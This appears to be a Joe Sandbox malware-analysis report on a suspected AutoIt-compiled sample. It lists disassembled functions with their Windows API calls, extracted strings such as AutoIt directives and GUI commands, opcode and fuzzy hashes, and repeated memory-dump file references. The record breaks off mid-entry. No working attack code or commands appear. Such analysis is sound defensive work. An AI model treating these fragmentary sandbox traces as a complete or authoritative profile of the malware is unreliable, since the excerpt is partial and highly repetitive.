                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: DialogNtdllProc_
                                                  • String ID:
                                                  • API String ID: 3239928679-0
                                                  • Opcode ID: bc03cfa736ddbaedaa117b826e8aaab70289720e9d5f322252a74be7ae83c5c2
                                                  • Instruction ID: b3f8dd98c75775a1a2c049c72e16f9879d2b8b3eed3037c1cd59b11093130560
                                                  • Opcode Fuzzy Hash: bc03cfa736ddbaedaa117b826e8aaab70289720e9d5f322252a74be7ae83c5c2
                                                  • Instruction Fuzzy Hash: 1EE0E279204209EFCB01DF88D844DD63BA5AB1E300F004054FA0547362CB71A820EBA2
                                                  Function 008816B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                    • Part of subcall function 0088201B: DestroyWindow.USER32(?), ref: 008820D3
                                                    • Part of subcall function 0088201B: KillTimer.USER32(-00000001,?), ref: 0088216E
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00881AE2,?,?), ref: 008816D4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                                                  • String ID:
                                                  • API String ID: 2797419724-0
                                                  • Opcode ID: 862a0dc6ea0091a10f12f4df0e85634a2025c02c26ba56c495a0db13d73ac552
                                                  • Instruction ID: 21f21b86154bf0d7c742ce1dc8bf72bac7ab7f105db62215d92bfcd7b1114b0e
                                                  • Opcode Fuzzy Hash: 862a0dc6ea0091a10f12f4df0e85634a2025c02c26ba56c495a0db13d73ac552
                                                  • Instruction Fuzzy Hash: B5D01271140308BBDA20BB94DC17F593A1DEB54B50F408021BA04E91D3DA716910A65A
                                                  Function 008C2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetUserNameW.ADVAPI32(?,?), ref: 008C2242
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: NameUser
                                                  • String ID:
                                                  • API String ID: 2645101109-0
                                                  • Opcode ID: a9e056546b4e260f10cf59328679d101abf3f915ee2851e984a95b6e4a3687b2
                                                  • Instruction ID: 99a9eaddc48583a74855bcbed1ac1434fd29dfbcf67e4b94dd27032207899883
                                                  • Opcode Fuzzy Hash: a9e056546b4e260f10cf59328679d101abf3f915ee2851e984a95b6e4a3687b2
                                                  • Instruction Fuzzy Hash: 30C04CF1C1410DDBDB15DB90DA98DEE77BCBB04314F104055A101F2101D7749B449E71
                                                  Function 008AA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 008AA36A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled
                                                  • String ID:
                                                  • API String ID: 3192549508-0
                                                  • Opcode ID: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                                                  • Instruction ID: 3839de2d887679ae65c6d4375d6ab527ffb68ddb97dc360c686ca4555ebd2467
                                                  • Opcode Fuzzy Hash: b4ddfd8451a4e09fa23330b7cba626b8a6cf3298f099bcb41dbfaf8663e7b122
                                                  • Instruction Fuzzy Hash: 09A0123001810CABCA001B41EC044447F9CD6002E07004020F40C40421873255105580
                                                  Function 00898A0E Relevance: .6, Instructions: 608COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2229784a5000e2636e412e9f023640a4eaf3810c221e5aee34ce0d72998ae40
                                                  • Instruction ID: 49436220916ba4a93e9735d98c5acfe112700b86a00de61bc27d97296e9f196d
                                                  • Opcode Fuzzy Hash: b2229784a5000e2636e412e9f023640a4eaf3810c221e5aee34ce0d72998ae40
                                                  • Instruction Fuzzy Hash: 6822147060561BCBDF28AB28C49467DB7A1FB03318F6C896BD842DB291DB34DD81DB61
                                                  Function 008A2405 Relevance: .3, Instructions: 345COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction ID: 2930c4a4e45338056cf2d74959c7bbe166d6d108fd167c5094990ccb8751adeb
                                                  • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                  • Instruction Fuzzy Hash: 31C172322051A309FF6D863D943413EBAE1BAA37B171A076DE4B3CB9D5EF20D564D620
                                                  Function 008A283A Relevance: .3, Instructions: 341COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction ID: dae6609a801792cf7797df7ade5582011e272c0182ec75830cc413020c350e1f
                                                  • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                  • Instruction Fuzzy Hash: 41C183322051A30AEF7D463D943413EBBE1ABA37B171A176DE4B2DB9D4EF20D5249620
                                                  Function 009037F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 009038AF
                                                  • IsWindowVisible.USER32(?), ref: 009038D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpperVisibleWindow
                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                  • API String ID: 4105515805-45149045
                                                  • Opcode ID: df0f811adc896ebc6dc065d8e9069b48357352507539181392c4e0816f48577b
                                                  • Instruction ID: 94e720b53f5320b69bc93fb839a2cba08ad8652b34f548e9a786a0cc9b2fad1d
                                                  • Opcode Fuzzy Hash: df0f811adc896ebc6dc065d8e9069b48357352507539181392c4e0816f48577b
                                                  • Instruction Fuzzy Hash: 80D17C30204315DFCB24EF18C495A6A77A9FF95344F148959F8C69B7E2CB25EE0ACB42
                                                  Function 0090A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetTextColor.GDI32(?,00000000), ref: 0090A89F
                                                  • GetSysColorBrush.USER32(0000000F), ref: 0090A8D0
                                                  • GetSysColor.USER32(0000000F), ref: 0090A8DC
                                                  • SetBkColor.GDI32(?,000000FF), ref: 0090A8F6
                                                  • SelectObject.GDI32(?,?), ref: 0090A905
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0090A930
                                                  • GetSysColor.USER32(00000010), ref: 0090A938
                                                  • CreateSolidBrush.GDI32(00000000), ref: 0090A93F
                                                  • FrameRect.USER32(?,?,00000000), ref: 0090A94E
                                                  • DeleteObject.GDI32(00000000), ref: 0090A955
                                                  • InflateRect.USER32(?,000000FE,000000FE), ref: 0090A9A0
                                                  • FillRect.USER32(?,?,?), ref: 0090A9D2
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0090A9FD
                                                    • Part of subcall function 0090AB60: GetSysColor.USER32(00000012), ref: 0090AB99
                                                    • Part of subcall function 0090AB60: SetTextColor.GDI32(?,?), ref: 0090AB9D
                                                    • Part of subcall function 0090AB60: GetSysColorBrush.USER32(0000000F), ref: 0090ABB3
                                                    • Part of subcall function 0090AB60: GetSysColor.USER32(0000000F), ref: 0090ABBE
                                                    • Part of subcall function 0090AB60: GetSysColor.USER32(00000011), ref: 0090ABDB
                                                    • Part of subcall function 0090AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0090ABE9
                                                    • Part of subcall function 0090AB60: SelectObject.GDI32(?,00000000), ref: 0090ABFA
                                                    • Part of subcall function 0090AB60: SetBkColor.GDI32(?,00000000), ref: 0090AC03
                                                    • Part of subcall function 0090AB60: SelectObject.GDI32(?,?), ref: 0090AC10
                                                    • Part of subcall function 0090AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0090AC2F
                                                    • Part of subcall function 0090AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0090AC46
                                                    • Part of subcall function 0090AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0090AC5B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                  • String ID:
                                                  • API String ID: 4124339563-0
                                                  • Opcode ID: e95b1e897fed3596620861284cdaca9af14f746b7b7025e4dea0f3ae89af34b5
                                                  • Instruction ID: c996092c723037b3dc574acaf8a655a9678b27f0c02ca595663e6c206cb32e44
                                                  • Opcode Fuzzy Hash: e95b1e897fed3596620861284cdaca9af14f746b7b7025e4dea0f3ae89af34b5
                                                  • Instruction Fuzzy Hash: 74A1AE7211C301EFDB209F64DC08E6B7BA9FF89321F104A29F962961E0D735DA44DB92
                                                  Function 008F77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 008F77F1
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008F78B0
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008F78EE
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 008F7900
                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 008F7946
                                                  • GetClientRect.USER32(00000000,?), ref: 008F7952
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 008F7996
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008F79A5
                                                  • GetStockObject.GDI32(00000011), ref: 008F79B5
                                                  • SelectObject.GDI32(00000000,00000000), ref: 008F79B9
                                                  • GetTextFaceW.GDI32(00000000,00000040,?), ref: 008F79C9
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008F79D2
                                                  • DeleteDC.GDI32(00000000), ref: 008F79DB
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 008F7A07
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 008F7A1E
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 008F7A59
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 008F7A6D
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 008F7A7E
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 008F7AAE
                                                  • GetStockObject.GDI32(00000011), ref: 008F7AB9
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 008F7AC4
                                                  • ShowWindow.USER32(00000004), ref: 008F7ACE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: 418729f3bf6cc0d68eb5d7a276bcbc5f6705bb50da048c573f2d696ad460bdc8
                                                  • Instruction ID: a9d56edcc0130b3b86231aa5572c322baf9e53d0eff25485d32c787663e28f13
                                                  • Opcode Fuzzy Hash: 418729f3bf6cc0d68eb5d7a276bcbc5f6705bb50da048c573f2d696ad460bdc8
                                                  • Instruction Fuzzy Hash: 0FA17EB1A54209BFEB14DBA8DC4AFAA7BB9FB45710F004114FA15E72E0D7B0AD00DB65
                                                  Function 008EAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 008EAF89
                                                  • GetDriveTypeW.KERNEL32(?,0090FAC0,?,\\.\,0090F910), ref: 008EB066
                                                  • SetErrorMode.KERNEL32(00000000,0090FAC0,?,\\.\,0090F910), ref: 008EB1C4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: 0d9367730000a8aef2cb81a1b5d2b55c8521a0f7a57020848fa5cbcdde82ed70
                                                  • Instruction ID: b7bec85f668f0bce819747a6608378c5a09b1f86e767d0bffd133f29151024a1
                                                  • Opcode Fuzzy Hash: 0d9367730000a8aef2cb81a1b5d2b55c8521a0f7a57020848fa5cbcdde82ed70
                                                  • Instruction Fuzzy Hash: AA51C230A84389EBCB14EB16C9A287E73B1FB96769B204025E44BE7290C735AD41DF43
                                                  Function 00886A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 1038674560-86951937
                                                  • Opcode ID: 54f768cd051c49cbe873517eaa924c2f66c2319d0dee5f91a3aea4b1f08c0f39
                                                  • Instruction ID: a3bbd80fca14e279a4fc3de3e608b1aba6a146fb290b65fdfbe311f25a2e1454
                                                  • Opcode Fuzzy Hash: 54f768cd051c49cbe873517eaa924c2f66c2319d0dee5f91a3aea4b1f08c0f39
                                                  • Instruction Fuzzy Hash: 3F812671640625AFDB24BB68CC82FEE3768FF16704F044025F945EA5C2FB60EA61C792
                                                  Function 00882C18 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 486windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • DestroyWindow.USER32 ref: 00882CA2
                                                  • DeleteObject.GDI32(00000000), ref: 00882CE8
                                                  • DeleteObject.GDI32(00000000), ref: 00882CF3
                                                  • DestroyCursor.USER32(00000000), ref: 00882CFE
                                                  • DestroyWindow.USER32(00000000), ref: 00882D09
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 008BC68B
                                                  • 69E7E349.COMCTL32(?,000000FF,?), ref: 008BC6C4
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 008BCAED
                                                    • Part of subcall function 00881B41: InvalidateRect.USER32(?,00000000,00000001), ref: 00881B9A
                                                  • SendMessageW.USER32(?,00001053), ref: 008BCB2A
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008BCB41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
